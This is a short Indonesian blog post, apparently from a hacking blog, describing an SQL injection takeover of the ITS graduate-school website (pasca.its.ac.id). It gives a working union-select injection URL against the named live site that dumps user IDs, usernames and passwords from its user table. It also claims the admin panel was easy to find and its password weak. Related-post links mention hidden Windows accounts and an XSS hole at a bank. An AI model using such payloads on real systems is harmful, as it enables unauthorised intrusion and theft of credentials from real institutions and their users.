Takeover Website Pascasarjana ITS
Terdapat celah SQL Injection pada website Pascasarjana Institut Teknologi Sepuluh Nopember (ITS). Celah berbahaya ini memungkinkan Attacker untuk memperoleh akses terhadap halaman admin web Pascasarjana Institut Teknologi Sepuluh Nopember (ITS).
http://www.pasca.its.ac.id/view_beritadetail.php?edit=-48 union select 1,2,version(),user(),5,group_concat(userid,0x2d2d,username,0x2d2d,userpass),7,8,9 from data_user
SQL Injection pada pasca.its.ac.id
Lokasi login untuk Adminnya mudah ditebak dan passwordnya ternyata cukup simple..
Halaman Admin pasca.its.ac.id
- Mengubah Text Tombol Start Menjadi Lebih Dari Lima Huruf
- Fungsi Pengganti Kelemahan Round() Pada Visual Basic
- Memanipulasi “localhost”
- Protocol Redirect: Playing With Secure Sockets Layer (SSL)
- Membuat Account Tersembunyi Pada Windows XP
- Fix Black Background Pada Cairo Dock
- Bank Bukopin Vulnerable to XSS
